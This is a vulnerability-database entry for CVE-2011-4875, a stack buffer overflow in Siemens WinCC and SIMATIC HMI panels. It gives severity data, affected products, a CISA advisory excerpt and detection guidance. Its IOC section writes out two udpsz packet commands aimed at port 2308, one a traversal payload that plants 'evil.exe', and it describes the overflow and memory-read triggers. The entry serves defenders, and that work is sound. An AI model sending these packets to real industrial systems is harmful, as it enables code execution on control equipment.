CVE-2011-4875
published 2012-02-03CVE-2011-4875: Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP, OP, MP…
PriorityP265critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
14.01%
96.1th percentile
Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP, OP, MP, Comfort Panels, and Mobile Panels SIMATIC HMI panels; WinCC V11 Runtime Advanced; and WinCC flexible Runtime, when Transfer Mode is enabled, allows remote attackers to execute arbitrary code via vectors related to Unicode strings.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| siemens | simatic_hmi_panels | — | — |
| siemens | simatic_hmi_panels | — | — |
| siemens | simatic_hmi_panels | — | — |
| siemens | simatic_hmi_panels | — | — |
| siemens | simatic_hmi_panels | — | — |
| siemens | wincc | — | — |
| siemens | wincc_flexible | — | — |
| siemens | wincc_flexible | — | — |
| siemens | wincc_flexible | — | — |
| siemens | wincc_flexible | — | — |
| siemens | wincc_runtime_advanced | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandudpsz -C "0004 03 00 00 00 00000000 00000000 00000000 00000000 00000000 ffffffff" -b a -T SERVER 2308 2+0x400↗
commandudpsz -C "0004 03" 0 -C "01000000 80000000" 0x16 -c ".\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0e\0v\0i\0l\0.\0e\0x\0e\0" 0x1e -T SERVER 2308 2+0x400↗
bytes↗
0xfa (first byte of URI triggers binary memory read mode in miniweb)
- →Monitor for UDP traffic to port 2308 containing the magic byte sequence '0004' as the first two bytes, which is the HmiLoad protocol header used in exploit attempts against CVE-2011-4875. ↗
- →Detect directory traversal attempts against miniweb (port 80/443) using encoded backslashes (%5c) in HTTP GET requests, e.g. patterns like '..%5c..%5c' in the URI. ↗
- →Detect HTTP POST requests to miniweb where the URI begins with byte 0xfa, which triggers an arbitrary memory read vulnerability. ↗
- →Detect oversized Unicode string payloads sent to HmiLoad on port 2308 (UDP); the overflow occurs when the 32-bit size field in the packet exceeds the 0x400-byte stack buffer (EBP-0x418). ↗
- →Alert on HmiLoad directory traversal packets to port 2308 containing Unicode-encoded '../' sequences (e.g. '.\0.\0/\0') in the filename field of write/read/delete operations. ↗
- ·HmiLoad only exposes the vulnerable attack surface when Transfer Mode is explicitly enabled; systems not in Transfer Mode are not directly exposed to the stack overflow. ↗
- ·No vendor fix was available at the time of disclosure; mitigations rely on network-level controls (firewall/ACL) blocking access to ports 2308, 4410, 80, and 443 on affected HMI systems. ↗
- ·Code execution via the stack overflow (Bug A) requires a two-stage attack: first corrupting memory beyond the 0x400-byte buffer using other packet types, then sending a large string size to trigger SEH corruption. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v2qv-37fh-hjmr: Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP,
ghsa_unreviewed·2022-05-17
CVE-2011-4875 [HIGH] CWE-119 GHSA-v2qv-37fh-hjmr: Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP,
Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP, OP, MP, Comfort Panels, and Mobile Panels SIMATIC HMI panels; WinCC V11 Runtime Advanced; and WinCC flexible Runtime, when Transfer Mode is enabled, allows remote attackers to execute arbitrary code via vectors related to Unicode strings.
CISA ICS
Siemens SIMATIC WinCC Vulnerabilities (UPDATE A)
cisa_ics·2011-12-22
Siemens SIMATIC WinCC Vulnerabilities (UPDATE A)
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Siemens SIMATIC WinCC Vulnerabilities (UPDATE A)
Last RevisedSeptember 06, 2018
Alert CodeICSA-12-030-01A
## Overview
This advisory is a follow-up to a previous advisory titled “ICSA-11-356-01 – Siemens HMI Authentication Vulnerabilities” that was published December 22, 2011, and an alert titled "ICS-ALERT-11-332-02A – Siemens SIMATIC WinCC Flexible Vulnerabilities" that was published December 2, 2011.
ICS-CERT has received reports from independent security researchers Billy Rios, Terry McCorkle, Shawn Merdinger, and Luigi Auriemma detailing several vulnerabilities in Siemens S
No detection rules found.
No writeups or analysis indexed.
http://aluigi.org/adv/winccflex_1-adv.txthttp://www.exploit-db.com/exploits/18166http://www.osvdb.org/77380http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-345442.pdfhttp://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02.pdfhttp://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02A.pdfhttp://www.us-cert.gov/control_systems/pdf/ICSA-12-030-01.pdfhttps://exchange.xforce.ibmcloud.com/vulnerabilities/71449http://aluigi.org/adv/winccflex_1-adv.txthttp://www.exploit-db.com/exploits/18166http://www.osvdb.org/77380http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-345442.pdfhttp://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02.pdfhttp://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02A.pdfhttp://www.us-cert.gov/control_systems/pdf/ICSA-12-030-01.pdfhttps://exchange.xforce.ibmcloud.com/vulnerabilities/71449
2012-02-03
Published